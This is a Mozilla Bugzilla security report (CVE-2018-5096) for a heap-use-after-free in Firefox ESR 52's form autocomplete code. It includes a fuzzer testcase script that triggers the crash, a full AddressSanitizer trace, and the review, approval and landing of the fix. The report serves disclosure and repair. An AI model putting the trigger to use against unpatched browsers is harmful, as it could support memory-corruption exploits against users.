Closed
Bug 1418922
(CVE-2018-5096)
Opened 7 years ago
Closed 6 years ago
heap-use-after-free in GetSelectionRange
Categories
(Core :: DOM: Core & HTML, defect, P1)
Tracking
()
RESOLVED
FIXED
| Tracking | Status | |
|---|---|---|
| firefox-esr52 | 58+ | fixed |
| firefox57 | --- | unaffected |
| firefox58 | --- | unaffected |
| firefox59 | --- | unaffected |
People
(Reporter: nils, Assigned: smaug)
References
Details
(4 keywords, Whiteboard: [adv-esr52.6+][fixed on trunk in bug 1343037])
Attachments
(3 files)
|
1023 bytes,
text/html
|
Details | |
|
23.82 KB,
text/plain
|
Details | |
|
1.96 KB,
patch
|
bzbarsky
:
review+
ritu
:
approval-mozilla-esr52+
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox ESR 52.5.0 (SourceStamp=f9df5238dca13e40b8128faba317df25e2f69249). It requires the fuzzPriv extension.
<script>
function spin () {
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try {x.send("X");} catch(e){}
}
function start() {
o33=document.createElementNS('http://www.w3.org/1999/xhtml','marquee');
document.documentElement.addEventListener('DOMAttrModified',fun0);
o36=document.createElementNS('http://www.w3.org/1999/xhtml','input');
window.top.document.documentElement.appendChild(o33);
window.top.setTimeout(fun1, 4);
}
function fun0() {
window.top.document.documentElement.appendChild(o36);
o36.focus();
}
function fun1() {
o90=document.createElementNS('http://www.w3.org/1999/xhtml','marquee');
document.documentElement.addEventListener('DOMAttrModified',fun2);
document.documentElement.appendChild(o90);
fuzzPriv.trustedKeyEvent(document.documentElement,'press',false,false,false,false,33,0);
}
function fun2() {
o36.parentNode.removeChild(o36);
spin();
o36=null;
fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();;
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==1018==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150007751b0 at pc 0x7f8e74682779 bp 0x7ffec6f028c0 sp 0x7ffec6f028b8
READ of size 4 at 0x6150007751b0 thread T0
#0 0x7f8e74682778 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12
#1 0x7f8e74682778 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:526
#2 0x7f8e74682778 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:916
#3 0x7f8e74682778 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:964
#4 0x7f8e74682778 in nsGenericHTMLElement::GetFormControlFrame(bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:1005
#5 0x7f8e7453e29a in GetSelectionRange /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:6445:43
#6 0x7f8e7453e29a in mozilla::dom::HTMLInputElement::GetSelectionStart(int*) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:6283
#7 0x7f8e77d67089 in GetSelectionStart /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:560:5
#8 0x7f8e77d67089 in non-virtual thunk to nsFormFillController::GetSelectionStart(int*) /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:557
#9 0x7f8e77d56663 in nsAutoCompleteController::MaybeCompletePlaceholder() /home/worker/workspace/build/src/toolkit/components/autocomplete/nsAutoCompleteController.cpp:1317:3
#10 0x7f8e77d469ab in nsAutoCompleteController::StartSearches() /home/worker/workspace/build/src/toolkit/components/autocomplete/nsAutoCompleteController.cpp:1358:3
#11 0x7f8e77d490a5 in nsAutoCompleteController::HandleKeyNavigation(unsigned int, bool*) /home/worker/workspace/build/src/toolkit/components/autocomplete/nsAutoCompleteController.cpp:565:11
#12 0x7f8e77d6b4dd in nsFormFillController::KeyPress(nsIDOMEvent*) /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:1081:5
#13 0x7f8e77d69dd8 in nsFormFillController::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/toolkit/components/satchel/nsFormFillController.cpp:871:12
#14 0x7f8e742c36ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#15 0x7f8e742c50d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#16 0x7f8e742afbcd in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:358:7
#17 0x7f8e742b34c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#18 0x7f8e742b53c7 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
#19 0x7f8e724a0991 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
#20 0x7f8e742d0590 in mozilla::dom::EventTarget::DispatchEvent(JSContext*, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:73:9
#21 0x7f8e739b158e in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle<JSObject*>, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:988:15
#22 0x7f8e739ae338 in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1164:13
#23 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#24 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#25 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#26 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#27 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#28 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#29 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#30 0x7f8e79d3da12 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
#31 0x7f8e70ec416f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
#32 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#33 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#34 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#35 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#36 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#37 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#38 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#39 0x7f8e79d3fc7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#40 0x7f8e73a0c769 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
#41 0x7f8e720bc167 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
#42 0x7f8e720bc167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
#43 0x7f8e720bdf00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
#44 0x7f8e7229d972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
#45 0x7f8e6f76a039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
#46 0x7f8e6f73e48c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
#47 0x7f8e6f75a4c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
#48 0x7f8e6f759e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
#49 0x7f8e6f74ccab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#50 0x7f8e6f7cedec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#51 0x7f8e70587d5f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#52 0x7f8e704f98b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#53 0x7f8e704f98b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#54 0x7f8e704f98b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#55 0x7f8e75b9ac6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#56 0x7f8e77c19071 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#57 0x7f8e77db0387 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
#58 0x7f8e77db1afd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
#59 0x7f8e77db29bc in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
#60 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
#61 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
#62 0x7f8e8b1b882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#63 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)
0x6150007751b0 is located 48 bytes inside of 496-byte region [0x615000775180,0x615000775370)
freed by thread T0 here:
#0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7f8e6f615744 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
#2 0x7f8e6f615336 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
#3 0x7f8e6f61c40e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
#4 0x7f8e6f61b8cc in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
#5 0x7f8e6f61f946 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
#6 0x7f8e724bc769 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
#7 0x7f8e71fe648d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
#8 0x7f8e6f7752b6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
#9 0x7f8e70f9c7be in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
#10 0x7f8e70f9c7be in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
#11 0x7f8e70f9c7be in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
#12 0x7f8e70fa3e48 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1000:12
#13 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#14 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#15 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#16 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#17 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#18 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#19 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#20 0x7f8e79d3da12 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
#21 0x7f8e70ec416f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
#22 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#23 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#24 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#25 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#26 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#27 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#28 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#29 0x7f8e79d3fc7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#30 0x7f8e738cbfcc in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7f8e742c3662 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
#32 0x7f8e742c3662 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1130
#33 0x7f8e742c50d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#34 0x7f8e742b00f9 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
#35 0x7f8e742b34c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#36 0x7f8e742b53c7 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
previously allocated by thread T0 here:
#0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f8e744f38a9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f8e744f38a9 in NS_NewHTMLInputElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129
#4 0x7f8e7469a756 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:291:41
#5 0x7f8e7469a756 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:263
#6 0x7f8e724f5638 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:177:12
#7 0x7f8e723afda1 in nsDocument::CreateElementNS(nsAString_internal const&, nsAString_internal const&, mozilla::dom::ElementCreationOptionsOrString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5481:8
#8 0x7f8e739044b9 in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1084:53
#9 0x7f8e73edf5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
#10 0x7f8e7a26e375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#11 0x7f8e7a26e375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#12 0x7f8e7a24e77f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#13 0x7f8e7a24e77f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#14 0x7f8e7a23393d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#15 0x7f8e7a26e9df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#16 0x7f8e7a26f022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#17 0x7f8e79d3fc7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#18 0x7f8e738c8bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#19 0x7f8e742f930a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#20 0x7f8e742f930a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#21 0x7f8e742c36ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#22 0x7f8e742c50d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#23 0x7f8e742afe36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#24 0x7f8e742b34c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#25 0x7f8e764ab21c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1047:7
#26 0x7f8e7725008b in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7638:5
#27 0x7f8e7724be94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7442:7
#28 0x7f8e772534ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7339:13
#29 0x7f8e713dcdc0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#30 0x7f8e713dbd58 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#31 0x7f8e713d8ab8 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#32 0x7f8e713dabb4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#33 0x7f8e713db76c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#34 0x7f8e6f92c6ca in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12 in GetBoolFlag
Shadow bytes around the buggy address:
0x0c2a800e69e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a800e69f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a800e6a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a800e6a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2a800e6a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a800e6a30: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c2a800e6a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a800e6a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2a800e6a60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c2a800e6a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2a800e6a80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1018==ABORTING
|
||
Updated•7 years ago
|
Group: core-security → dom-core-security
|
Assignee | |
Comment 2•7 years ago
|
||
I think this is clear from the stack trace. Taking.
Assignee: nobody → bugs
|
|
Assignee | |
Comment 3•7 years ago
|
||
Except that no luck on reproducing yet.
|
||
Updated•7 years ago
|
|
|
Assignee | |
Comment 4•7 years ago
|
||
I can reproduce.
|
|
Assignee | |
Comment 5•7 years ago
|
||
I think bug 1343037 fixed this on trunk, but we can't take all that to esr52, so adding some strong pointers. Commit message could be something like -m "Bug 1418922, port parts of Bug 1343037 to esr52, r=bz"
Attachment #8931060 -
Flags: review?(bzbarsky)
|
||
Comment 6•7 years ago
|
||
Comment on attachment 8931060 [details] [diff] [review] esr52_formcontroller.diff r=me
Attachment #8931060 -
Flags: review?(bzbarsky) → review+
|
|
Assignee | |
Comment 7•7 years ago
|
||
Comment on attachment 8931060 [details] [diff] [review] esr52_formcontroller.diff [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: This is sec-high User impact if declined: crashes Fix Landed on Version: Bug 1343037 landed in 55, and that happened to fix this too. Risk to taking this patch (and alternatives if risky): Should be super safe String or UUID changes made by this patch: NA
Attachment #8931060 -
Flags: approval-mozilla-esr52?
|
||
Updated•7 years ago
|
Priority: -- → P1
|
||
Updated•7 years ago
|
status-firefox57:
--- → unaffected
status-firefox58:
--- → unaffected
status-firefox59:
--- → unaffected
status-firefox-esr52:
--- → affected
tracking-firefox-esr52:
--- → ?
|
|
Assignee | |
Updated•6 years ago
|
Summary: heap-use-after-free in GetSelectionRange → heap-use-after-free in GetSelectionRange {waiting approval}
Comment on attachment 8931060 [details] [diff] [review] esr52_formcontroller.diff Sec-high, ESR52+
Attachment #8931060 -
Flags: approval-mozilla-esr52? → approval-mozilla-esr52+
|
|
||
Comment 9•6 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-esr52/rev/aa55d4cdaee5
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
|
|
